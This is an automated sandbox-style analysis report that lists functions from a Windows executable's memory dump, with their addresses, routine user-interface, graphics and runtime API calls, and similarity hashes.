                                      • Opcode ID: 47ac76d3a4286c0aeb73ae52c6f7085f5d7f31cb17f0d072d8e8463c81c36476
                                      • Instruction ID: ec2d402bd92ff8bd2b9571b42e1720bf66644e5120e22b6cca267d7522bfd557
                                      • Opcode Fuzzy Hash: 47ac76d3a4286c0aeb73ae52c6f7085f5d7f31cb17f0d072d8e8463c81c36476
                                      • Instruction Fuzzy Hash: 0501C4312887016BFF211A258C0AB6B6355AF11B55F205A6BF501E12E1CBA8DC53C55D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440B31, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00440B53
                                      • GetWindow.USER32(00000000,00000005), ref: 00440B6F
                                      • GetWindow.USER32(00000000,00000002), ref: 00440B85
                                      • GetWindow.USER32(00000000,00000002), ref: 00440B90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window
                                      • String ID: @-G
                                      • API String ID: 2353593579-1196022286
                                      • Opcode ID: da314168261c7fb4baca767237a719160f724def35fda72bebc97a6ffcac1145
                                      • Instruction ID: d8a140ab4dce615356c2245ed0e664d15ed43b9b654449af4086953ebe77c088
                                      • Opcode Fuzzy Hash: da314168261c7fb4baca767237a719160f724def35fda72bebc97a6ffcac1145
                                      • Instruction Fuzzy Hash: 2EF0F42734074522E23161AA6C86F6BB798CBE1B25F10003BF704A6282ED69E824423D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440C21, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00440C55
                                      • GetWindowLongA.USER32 ref: 00440C62
                                      • SetTextColor.GDI32(?,00000000), ref: 00440C7F
                                      • SetBkColor.GDI32(?,00000000), ref: 00440C8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ColorWindow$LongText
                                      • String ID: @-G
                                      • API String ID: 3945788684-1196022286
                                      • Opcode ID: a47fe7cc8f97ddd447ca87251803984e5713b9efd555973ec74b7ead7b019b92
                                      • Instruction ID: fa080b043639f9ff9c80182d3a7f6b499dc77eea3cf8a8ec5aadc1ef73b1efb1
                                      • Opcode Fuzzy Hash: a47fe7cc8f97ddd447ca87251803984e5713b9efd555973ec74b7ead7b019b92
                                      • Instruction Fuzzy Hash: EF01DD36119250DBEB34D774AD88ADF7754EB91322F004A27F641C31A4C3389991C26D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043B663, Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStartupInfoA.KERNEL32(?), ref: 0043B6C1
                                      • GetFileType.KERNEL32(?,?,00000000), ref: 0043B76C
                                      • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0043B7CF
                                      • GetFileType.KERNEL32(00000000,?,00000000), ref: 0043B7DD
                                      • SetHandleCount.KERNEL32 ref: 0043B814
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileHandleType$CountInfoStartup
                                      • String ID:
                                      • API String ID: 1710529072-0
                                      • Opcode ID: 0eade221e94c48650ff76caf6fcf19b6ec12200e2334e782ae47dfbccec2ebc5
                                      • Instruction ID: 46481e97061966e4428f6709ebec281b0e012d85a4d1cbe2264cd633cde2eb37
                                      • Opcode Fuzzy Hash: 0eade221e94c48650ff76caf6fcf19b6ec12200e2334e782ae47dfbccec2ebc5
                                      • Instruction Fuzzy Hash: 925127719046018FC720CF38C8887667BE0EB89368F29567FD6A68B3E1D738D945C799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004455AC, Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004455FE
                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00445620
                                      • GetCapture.USER32 ref: 00445632
                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00445641
                                      • WinHelpA.USER32 ref: 00445655
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$CaptureHelp
                                      • String ID:
                                      • API String ID: 1616918565-0
                                      • Opcode ID: 24f8b75905912948e1aab5aa90071a0e64e00ad2f495bf43c9700723e05917e6
                                      • Instruction ID: bf8f2667cc318fd8a562c4fb9357d2f08ddf87b87023d6ba38354b39d512c595
                                      • Opcode Fuzzy Hash: 24f8b75905912948e1aab5aa90071a0e64e00ad2f495bf43c9700723e05917e6
                                      • Instruction Fuzzy Hash: A4219271200608BFFB206F65CC86F7ABBA9EF04758F158539B211975E3CB759C009B64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004406A0, Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6aed253b80fae7566f2fd8e51e0ef7920f7c43528cf22fef89e135d213c1d9fb
                                      • Instruction ID: 0bb7f15bec8333e2fe4e6f2ca84b3c713c97abf9fd1d941e05386a267798ac60
                                      • Opcode Fuzzy Hash: 6aed253b80fae7566f2fd8e51e0ef7920f7c43528cf22fef89e135d213c1d9fb
                                      • Instruction Fuzzy Hash: 8D3148316142209FE3749B18EA49A6237B0FB94356F11813BE68EC72A2C7F49C95CF19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044BCF1, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMapMode.GDI32(?,?,?,?,?,?,0042F459,?,00000000,?,?,?,?,?,?,?), ref: 0044BD01
                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0044BD3B
                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0044BD44
                                        • Part of subcall function 0044A868: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 0044A879
                                        • Part of subcall function 0044A868: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 0044A886
                                        • Part of subcall function 0044A868: MulDiv.KERNEL32(?,00000000,00000000), ref: 0044A8AB
                                        • Part of subcall function 0044A868: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 0044A8C6
                                      • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0044BD68
                                      • MulDiv.KERNEL32(00000002,000009EC,?), ref: 0044BD73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CapsDevice$ModeViewportWindow
                                      • String ID:
                                      • API String ID: 2598972148-0
                                      • Opcode ID: 03f19f7b51fd1e37733d963cf7d8ac10634022bc776e7559f60925ad547ee638
                                      • Instruction ID: 3b3ddf1760b2ef514a17aac1a64369faae310b8f0b3a0117a8fd4d40ac32d530
                                      • Opcode Fuzzy Hash: 03f19f7b51fd1e37733d963cf7d8ac10634022bc776e7559f60925ad547ee638
                                      • Instruction Fuzzy Hash: 4C11C271600604EFE7116F16CC44E1EBBA9EF88751B11446AE98597371CB75EC428F94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044BD7F, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMapMode.GDI32(?,00000000,?,?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044BD8F
                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0044BDC9
                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0044BDD2
                                        • Part of subcall function 0044A7FF: GetWindowExtEx.GDI32(?,0042F48D,00000000,?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A810
                                        • Part of subcall function 0044A7FF: GetViewportExtEx.GDI32(?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A81D
                                        • Part of subcall function 0044A7FF: MulDiv.KERNEL32(0042F48D,00000000,00000000), ref: 0044A842
                                        • Part of subcall function 0044A7FF: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 0044A85D
                                      • MulDiv.KERNEL32(0042F48D,00000060,000009EC), ref: 0044BDF6
                                      • MulDiv.KERNEL32(46892C46,?,000009EC), ref: 0044BE01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CapsDevice$ModeViewportWindow
                                      • String ID:
                                      • API String ID: 2598972148-0
                                      • Opcode ID: 212e9706f997d4c6b5321b5725502b7d42eeb663ef1b0b42501b037c2dbc1ba0
                                      • Instruction ID: 574601f981b23d2e8aacdb28edd01b740e87dbfbfe38d9c73454c85138a4b51a
                                      • Opcode Fuzzy Hash: 212e9706f997d4c6b5321b5725502b7d42eeb663ef1b0b42501b037c2dbc1ba0
                                      • Instruction Fuzzy Hash: BF110275600600EFEB219F19CC44D1EBBA9EF88710B11482AF98197371CB31EC418B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043496E, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?), ref: 0043498E
                                      • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 00434996
                                      • lstrlenA.KERNEL32(?), ref: 0043499E
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 004349C4
                                      • SysAllocString.OLEAUT32 ref: 004349CB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocByteStringlstrlen$CharMultiWide
                                      • String ID:
                                      • API String ID: 1909028937-0
                                      • Opcode ID: 9d16d9926812b6db788e4967131d4df17530516c089d28d4b58ed3abdf3f4726
                                      • Instruction ID: a46f0177f23d0a8f6f826f2c993b119930ec1d11279d5ad8964c46c23d84eeb9
                                      • Opcode Fuzzy Hash: 9d16d9926812b6db788e4967131d4df17530516c089d28d4b58ed3abdf3f4726
                                      • Instruction Fuzzy Hash: 2401F772500214BBD7105BA2DC04BABB7ACEF4A366F008123FD00D6261D774DD10CBE9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004385D3, Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 004385D5
                                      • TlsGetValue.KERNEL32(?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 004385E3
                                      • SetLastError.KERNEL32(00000000,?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 0043862F
                                        • Part of subcall function 0043CC20: HeapAlloc.KERNEL32(00000008,?,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 0043CC75
                                      • TlsSetValue.KERNEL32(00000000,?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 00438607
                                      • GetCurrentThreadId.KERNEL32 ref: 00438618
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ErrorLastValue$AllocCurrentHeapThread
                                      • String ID:
                                      • API String ID: 2020098873-0
                                      • Opcode ID: fcf45feb30ef176d83f47cbaa537ce4877940fa7b0f49ac5e8278708330959a4
                                      • Instruction ID: d5b39bc7e7ffdfef539aee699344ae7aa9e96877fb2fa71ef9a9a9f54781726a
                                      • Opcode Fuzzy Hash: fcf45feb30ef176d83f47cbaa537ce4877940fa7b0f49ac5e8278708330959a4
                                      • Instruction Fuzzy Hash: 31F0F6365017116BD7302B61EC0A71B7A50EF0D7B2F11167EF541E62B1EF28C80187AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044CCC7, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      • TlsFree.KERNEL32(00000000,?,?,0044D1D4,00000000,00000001), ref: 0044CCD3
                                      • GlobalHandle.KERNEL32(00741E08), ref: 0044CCFB
                                      • GlobalUnlock.KERNEL32(00000000,?,?,0044D1D4,00000000,00000001), ref: 0044CD04
                                      • GlobalFree.KERNEL32 ref: 0044CD0B
                                      • DeleteCriticalSection.KERNEL32(00471264,?,?,0044D1D4,00000000,00000001), ref: 0044CD15
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                      • String ID:
                                      • API String ID: 2159622880-0
                                      • Opcode ID: 3d7bc8cfa3e9fbba55667e20e25ca01bd0eeae1029c5182b69564233bbe51952
                                      • Instruction ID: 1a2d7103c6ccf2c6248e9f3a4988d7e4f1cd0b93f2cc9ed28b72bac8d6bdab5f
                                      • Opcode Fuzzy Hash: 3d7bc8cfa3e9fbba55667e20e25ca01bd0eeae1029c5182b69564233bbe51952
                                      • Instruction Fuzzy Hash: D6F0BB352016009BD7105B7CAC88B2B77ADAF8575571D056AF405D3272CB74DC018668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004316DF, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00431800
                                      • CoTaskMemFree.OLE32(?,?,00000000), ref: 004319E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Task$AllocFree
                                      • String ID: $(
                                      • API String ID: 3007142545-55695022
                                      • Opcode ID: 4f541a401770cf01e4c11c3996786a4f1659b198a53bde040e6703a184917f61
                                      • Instruction ID: f20197ec8c77d40593cb984b8be26e07b6dc6deda75bd64006856094a9cadf63
                                      • Opcode Fuzzy Hash: 4f541a401770cf01e4c11c3996786a4f1659b198a53bde040e6703a184917f61
                                      • Instruction Fuzzy Hash: B1B148B0A002099FCB14DFA9C894AAEFBF5FF88304F24455EE056EB261D774A945CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441300, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000000), ref: 00441331
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Color
                                      • String ID: d-G$d-G
                                      • API String ID: 2811717613-459862128
                                      • Opcode ID: 110366f04300478ba4bb5291405728027e2b7820d422dde37fa4335d02143908
                                      • Instruction ID: 15a21e2f2c78e1649e0665a89a9b12d00473a4ded9b23192b3c1f7affa55b801
                                      • Opcode Fuzzy Hash: 110366f04300478ba4bb5291405728027e2b7820d422dde37fa4335d02143908
                                      • Instruction Fuzzy Hash: 8A41C4765083009FE724DF15E84465BB7E4FBC4714F84493EF98983260D378D989CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044951D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalLock.KERNEL32 ref: 00449539
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0044958C
                                      • GlobalUnlock.KERNEL32(?), ref: 00449623
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Global$ByteCharLockMultiUnlockWide
                                      • String ID: System
                                      • API String ID: 231414890-3470857405
                                      • Opcode ID: a85947741f6bd03062891b0e1b79d4d7644b8f0d33fafd257d99d8d3042ec707
                                      • Instruction ID: 604e5efbd8bba617ec4ceac61edfe7040de23fe45b777964414c3ba1df942715
                                      • Opcode Fuzzy Hash: a85947741f6bd03062891b0e1b79d4d7644b8f0d33fafd257d99d8d3042ec707
                                      • Instruction Fuzzy Hash: 9A41C572800205FFDB11DF94C8819AF7BB4FF04354F24C16AE815AB255D7349E46DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameA.USER32(?,?,00000010), ref: 00441BC1
                                      • lstrcmpA.KERNEL32(Button,?), ref: 00441BDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClassNamelstrcmp
                                      • String ID: Button
                                      • API String ID: 3770760073-1034594571
                                      • Opcode ID: 6fb1238a6c0f8c8f731b0a6fec269b85fa975d4365148c330b7492b8b68e1e13
                                      • Instruction ID: 885c6621b04a9bea72ddfdcc43ab977dc6bc654b8cc468f0311ee07937fa006d
                                      • Opcode Fuzzy Hash: 6fb1238a6c0f8c8f731b0a6fec269b85fa975d4365148c330b7492b8b68e1e13
                                      • Instruction Fuzzy Hash: BB21F9766002181FF710AB58EC85DFB335CEA85366F84097BFD15C2231F62BE55982AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044C035, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuCheckMarkDimensions.USER32 ref: 0044C041
                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0044C0F0
                                      • LoadBitmapA.USER32 ref: 0044C108
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                      • String ID:
                                      • API String ID: 2596413745-3916222277
                                      • Opcode ID: 99f9c37ed659e03d958843df24a736969a8c67dab7c2c1fa28bccac15947d29c
                                      • Instruction ID: 042a87b8abca8814ce77c1eec56ed6c1f46f85acefc00441d45da69311356965
                                      • Opcode Fuzzy Hash: 99f9c37ed659e03d958843df24a736969a8c67dab7c2c1fa28bccac15947d29c
